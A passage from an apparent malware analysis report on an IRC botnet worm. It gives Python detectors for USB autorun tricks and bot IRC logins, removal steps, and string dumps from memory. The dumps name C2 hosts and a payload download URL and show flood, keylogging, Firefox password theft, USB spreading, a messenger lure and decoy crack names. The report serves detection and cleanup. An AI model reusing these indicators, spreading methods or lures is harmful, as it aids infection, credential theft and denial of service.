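    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        by_lower = {f.lower(): f for f in filenames}
        if "autorun.inf" in by_lower:
            inf = os.path.join(dirpath, by_lower["autorun.inf"])
            for target in autorun_targets(inf):
                findings.append(("autorun", inf, target))
        if "desktop.ini" in by_lower:
            ini = os.path.join(dirpath, by_lower["desktop.ini"])
            if is_recycle_bin_disguise(ini):
                exes = sorted(f for f in filenames if f.lower().endswith(EXECUTABLE_EXT))
                findings.append(("recycle_bin_disguise", dirpath, ", ".join(exes)))
    return findings


def build_sample_drive():
    """Constructed drive layout for demonstration (folder and file names are assumptions)."""
    root = tempfile.mkdtemp(prefix="usb_")
    hidden = os.path.join(root, "RECYCLER")
    os.makedirs(hidden)
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\r\nopen=RECYCLER\\usbBlock.exe\r\n"
                 "shell\\open\\command=RECYCLER\\usbBlock.exe\r\n"
                 "icon=%SystemRoot%\\system32\\SHELL32.dll,2\r\n")
    with open(os.path.join(hidden, "desktop.ini"), "wb") as fh:   # UTF-16, as Explorer writes it
        fh.write(("[.ShellClassInfo]\r\nCLSID=%s\r\n" % RECYCLE_BIN_CLSID).encode("utf-16"))
    open(os.path.join(hidden, "usbBlock.exe"), "wb").close()       # empty stand-in for the payload
    return root


if __name__ == "__main__":
    for kind, path, detail in scan_drive(build_sample_drive()):
        print("%-22s %s -> %s" % (kind, path, detail))
```

Point scan_drive at the root of a mounted drive to use it for real; the icon= line is deliberately not reported, since it only changes how the drive looks, while every open=, shellexecute= and shell\...\command= value is.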
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Cyanide.exe:348
Cyanide.exe:1972
winsvc32.exe:344
Ganja145.exe:1436
NESbot.exe:612
NESbot.exe:1388
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
%Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
%WinDir%\winsvc32.exe (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsvc32" = "winsvc32.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
(The RunOnce value is the cabinet self-extractor's one-time cleanup of its IXP000.TMP folder; it does not relaunch the Trojan, so removing it is optional.)
- Remove the firewall exception for msconfig.exe under [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List].
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives, including folders whose Desktop.ini makes them appear as the Recycle Bin. The bot's strings also reference %appdata%\lsass.exe; check for that file as well (the genuine lsass.exe lives only in %System%).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 66.72.12.25
Legal Copyright: Copyright (c) 2014
Legal Trademarks:
Original Filename: sokidsmfsdfsdfs.exe
Internal Name: sokidsmfsdfsdfs.exe
File Version: 66.72.12.25
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 49252 | 49664 | 4.34574 | 0480df25e05b678afc1c4fe541b6f140 |
.reloc | 65536 | 12 | 512 | 0.056519 | bf805fbb74b19f1e2e0bd1f15591e752 |
.rsrc | 73728 | 2588 | 3072 | 2.54019 | 5dfb93c34d83e1f1621fa635f022a43e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
0aaed1ed0c5752822e49e2fcac00792d
Network Activity
URLs
URL | IP |
---|---|
hxxp://icetelecoms.co.uk/msn/msn.exe | 212.1.215.86 |
root2.zapto.org | 90.147.119.154 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /msn/msn.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icetelecoms.co.uk
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 12:39:48 GMT
Server: Apache
Last-Modified: Sun, 11 Jan 2015 18:17:04 GMT
ETag: "5b50f11-28000-50c64659b4208"
Accept-Ranges: bytes
Content-Length: 163840
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
[Response body: a PE executable (MZ/PE headers, "This program cannot be run in DOS mode", sections .text, .data and .rsrc, imports from ADVAPI32.dll, KERNEL32.dll, NTDLL.DLL, GDI32.dll, USER32.dll, COMCTL32.dll and VERSION.dll); binary content not reproduced]
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s) (map image not reproduced; see the URL table above):
Strings from Dumps
msconfig.exe_1532:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
WS2_32.dll
WS2_32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
PRIVMSG
PRIVMSG
pong|cmd.exe###
pong|cmd.exe###
udp.stop
udp.stop
rndnick
rndnick
Cerebral botakeylog
Cerebral botakeylog
The One botspread.start
The One botspread.start
Skid placed botsregsrvs.exe
Skid placed botsregsrvs.exe
Older Botschngnick
Older Botschngnick
[FTP]
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
explorer.exe
EXPLORER.EXE
EXPLORER.EXE
winlogon.exe
winlogon.exe
csrss.exe
csrss.exe
WINLOGON.EXE
WINLOGON.EXE
services.exe
services.exe
SERVICES.EXE
SERVICES.EXE
%s\%s%i%i.exe
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
o.informate en el siguiente enlace
BeeSwarm.exe
BeeSwarm.exe
MAPI32.DLL
MAPI32.DLL
*.html
*.html
%s\%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s
%s %s "" "TsGh" :%s
%s %s "" "TsGh" :%s
%s %s %s
%s %s %s
%s %s :%s
%s %s :%s
%s :%s
%s :%s
ganja%s.exe
ganja%s.exe
%s Updating to: %s
%s Updating to: %s
%s Execution Failed!
%s Execution Failed!
%s Dowload Failed!
%s Dowload Failed!
%s Has Been Visited!
%s Has Been Visited!
Windows Live Messenger
Windows Live Messenger
Ganja%s.exe
Ganja%s.exe
[Download]: Executed Successfully
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
NhG.gov
msconfig.exe
msconfig.exe
WindowsUpdate
WindowsUpdate
Block.exe
Block.exe
s.flood
s.flood
NICK
NICK
JOIN
JOIN
root2.zapto.org
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
[Speedtest]: %d kB/s
Windows Security Alert
Windows Security Alert
new{BoT-%s-%s}%s
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
%d.%d.%d.%d
\google_cache%s.tmp
\google_cache%s.tmp
website=1
website=1
\Desktop.ini
\Desktop.ini
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
\autorun.inf
11Infected Drive %s
11Infected Drive %s
new{BoT-XP-USA}508870
new{BoT-XP-USA}508870
\google_cache2.tmp
\google_cache2.tmp
Ganja145.exe_1436:
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
COMCTL32.dll
VERSION.dll
advapi32.dll
advpack.dll
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupx.dll
IXPd.TMP
TMP4351$.TMP
FINISHMSG
USRQCMD
ADMQCMD
msdownld.tmp
wextract.pdb
PSSSSSSh
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
GetWindowsDirectoryA
ExitWindowsEx
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
hhh.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
33333330
3333333
33333333
~hq.Ol
%s,LYR}
CG.WT
Ul;y%S
.MPcu
4Ys-o}(
%xmvB
Please read the following license agreement. Press the PAGE DOWN key to see the rest of the agreement.
CFailed to get disk space information from: %s.
System Message: %s.&A required resource cannot be located. Are you sure you want to cancel?
8Unable to retrieve operating system version information.!Memory allocation request failed.
Filetable full.Ên not change to destination folder.
Setup could not find a drive with %s KB free disk space to install the program. Please free up some space first and press RETRY or press CANCEL to exit setup.KThat folder is invalid. Please make sure the folder exists and is writable.IYou must specify a folder with fully qualified pathname or choose Cancel.!Could not update folder edit box.5Could not load functions required for browser dialog.7Could not load Shell32.dll required for browser dialog.
(Error creating process . Reason: %s1The cluster size in this system is not supported.,A required resource appears to be corrupted.QWindows 95 or Windows NT 4.0 Beta 2 or greater is required for this installation.
Error loading %shGetProcAddress() failed on function '%s'. Possible reason: incorrect version of advpack.dll being used./Windows 95 or Windows NT is required to install
Could not create folder '%s'
To install this program, you need %s KB disk space on drive %s. It is recommended that you free up the required disk space before you continue.
Error retrieving Windows folder
$NT Shutdown: OpenProcessToken error.)NT Shutdown: AdjustTokenPrivileges error.!NT Shutdown: ExitWindowsEx error.}Extracting file failed. It is most likely caused by low memory (low disk space for swapping file) or corrupted Cabinet file.aThe setup program could not retrieve the volume information for drive (%s) .
System message: %s.xSetup could not find a drive with %s KB free disk space to install the program. Please free up some space and try again.eThe installation program appears to be damaged or corrupted. Contact the vendor of this application.
/C: -- Override Install Command defined by author.
eAnother copy of the '%s' package is already running on your system. Do you want to run another copy?
Could not find the file: %s.
:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
6.00.2900.5512 (xpsp.080413-2105)
WEXTRACT.EXE
Windows
Operating System
6.00.2900.5512
msconfig.exe_1532_rwx_00350000_0000B000:
.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
(English gloss of the two Spanish lure strings above, which are the message the bot sends to messenger contacts; the string is apparently split where a non-ASCII character dropped out: "Hi, 2012 the end of the world, they have already confirmed that a meteorite is coming and have said nothing. Here you can see some NASA images of the places where the Earth is deteriorating, there is only a[...] left. Find out at the following link")
BeeSwarm.exe
MAPI32.DLL
*.html
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s
msconfig.exe_1532_rwx_009F0000_0000B000:
.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
(English gloss of the two Spanish lure strings above, which are the message the bot sends to messenger contacts; the string is apparently split where a non-ASCII character dropped out: "Hi, 2012 the end of the world, they have already confirmed that a meteorite is coming and have said nothing. Here you can see some NASA images of the places where the Earth is deteriorating, there is only a[...] left. Find out at the following link")
BeeSwarm.exe
MAPI32.DLL
*.html
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s
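The injected msconfig.exe regions above carry the bot's IRC vocabulary: the verbs NICK, JOIN and PRIVMSG, the dynamic-DNS host root2.zapto.org, and the nick templates new{BoT-%s-%s}%s / {BoT-%s-%s}%s, seen filled in as new{BoT-XP-USA}508870. The NESbot strings further down add the login line USER NESv5 * 0 :%s and a second host, nhg24.zapto.org. The Python below is an added example, not code from this report or from the malware: it parses the client half of an IRC login from a constructed session and scores it against those templates, which is the check a responder would run over a proxy log or a pcap's reassembled client stream. The channel name, PASS value, channel key and the host irc.example.net are made up for the sample; the two zapto.org hosts are the ones named in the dump.

```python
import re

# Nick template from the injected msconfig.exe region: "new{BoT-%s-%s}%s" and
# "{BoT-%s-%s}%s", seen instantiated as "new{BoT-XP-USA}508870" (OS, country, digits).
BOT_NICK_RE = re.compile(r"^(?:new)?\{BoT-[A-Za-z0-9]+-[A-Za-z0-9]+\}\d+$")

# Login template from the NESbot strings: "USER NESv5 * 0 :%s".
USER_RE = re.compile(r"^USER\s+(\S+)\s+\S+\s+\S+\s+:(.*)$")

# Dynamic-DNS hosts named in the dump as IRC rendezvous points.
REPORTED_C2_HOSTS = {"root2.zapto.org", "nhg24.zapto.org"}


def parse_irc_client_lines(stream: str) -> dict:
    """Collect the login facts from the client-to-server half of an IRC session."""
    facts = {"pass": None, "nick": None, "user_ident": None, "realname": None,
             "channels": [], "privmsgs": 0}
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        verb, _, rest = line.partition(" ")
        verb = verb.upper()
        if verb == "PASS":
            facts["pass"] = rest
        elif verb == "NICK":
            facts["nick"] = rest
        elif verb == "USER":
            m = USER_RE.match(line)
            if m:
                facts["user_ident"], facts["realname"] = m.group(1), m.group(2)
        elif verb == "JOIN":
            # "JOIN %s" or "JOIN %s %s" (channel plus key); both forms are in the dump
            facts["channels"].append(rest.split(" ", 1)[0])
        elif verb == "PRIVMSG":
            facts["privmsgs"] += 1
    return facts


def score_session(stream: str, server_host: str) -> dict:
    """Return a verdict plus the indicators that produced it."""
    facts = parse_irc_client_lines(stream)
    reasons = []
    if facts["nick"] and BOT_NICK_RE.match(facts["nick"]):
        reasons.append("nick matches {BoT-OS-CC}NNNN template")
    if facts["user_ident"] == "NESv5":
        reasons.append("USER ident is NESv5")
    if server_host.lower() in REPORTED_C2_HOSTS:
        reasons.append("server " + server_host + " is a C2 host named in the report")
    return {"facts": facts, "reasons": reasons,
            "verdict": "irc-bot" if reasons else "no-match"}


# Constructed session, not captured traffic: the values follow the templates above;
# the password, channel and key are invented for the sample.
SAMPLE_BOT_SESSION = "\r\n".join([
    "PASS s3cret",
    "NICK new{BoT-XP-USA}508870",
    "USER NESv5 * 0 :508870",
    "JOIN #nhg k3y",
    "PRIVMSG #nhg :[Speedtest]: 512 kB/s",
]) + "\r\n"

# Constructed ordinary client login for contrast.
SAMPLE_HUMAN_SESSION = "NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #python\r\n"

if __name__ == "__main__":
    for host, sess in (("root2.zapto.org", SAMPLE_BOT_SESSION),
                       ("irc.example.net", SAMPLE_HUMAN_SESSION)):
        r = score_session(sess, host)
        print(host, r["verdict"], r["reasons"])
```

The nick regex is deliberately tied to the braces and the BoT- prefix rather than to the XP/USA values, since the %s fields vary per victim; the USER ident and the server name are independent signals, so a single match of any one is enough to pull the session for review.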
NESbot.exe_612:
.text
`.rdata
@.data
VkKeyScanA
keybd_event
EnumWindows
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C 6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C 2008 KeyGen.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Crack.exe
Windows Vista Keygen
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
keygen
KeyGen.exe
shlwapi.dll
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d
KeyGen
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons2.txt
signons3.txt
pstorec.dll
%s %s %s:%s
http:/
https:/
kWindows Security Alert
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
TASKMGR.EXE
%s gained access..
%s did not break in..
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s out.
%s error: no user at:
%s invalid slot:
%s kill: threads
%s no threads
%s killed thread:
%s failed kt:
%s %s already running: .
%s faild 2 start %s, err: .
%s status: %s.
uptime: %s,
for: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
%s Advapi.dll Failed
%s PStore.dll Failed.
%s Main thread.
%s RuC.
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s Thread Disabled.
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s %s
%s seeding!
%s unable to download file
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s updating from %s
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error:
%s Failed to create process: "%s", error:
%s Created process: "%s", PID:
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error:
Ping Timeout? (%d-%d)%d/%d
PASS %s
NICK %s
USER NESv5 * 0 :%s
QUIT %s
JOIN
PRIVMSG
NICK
PONG %s
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
MODE %s %s
MODE %s %s %s
Torrent 1.8.1
%d.%d.%d.%d
kernel32.dll
user32.dll
advapi32.dll
RegEnumKeyExA
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
FtpGetFileA
FtpPutFileA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
netapi32.dll
dnsapi.dll
iphlpapi.dll
GetTcpTable
GetUdpTable
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
userenv.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
%s%%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
winsvc32.exe
DataBlock.exe
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
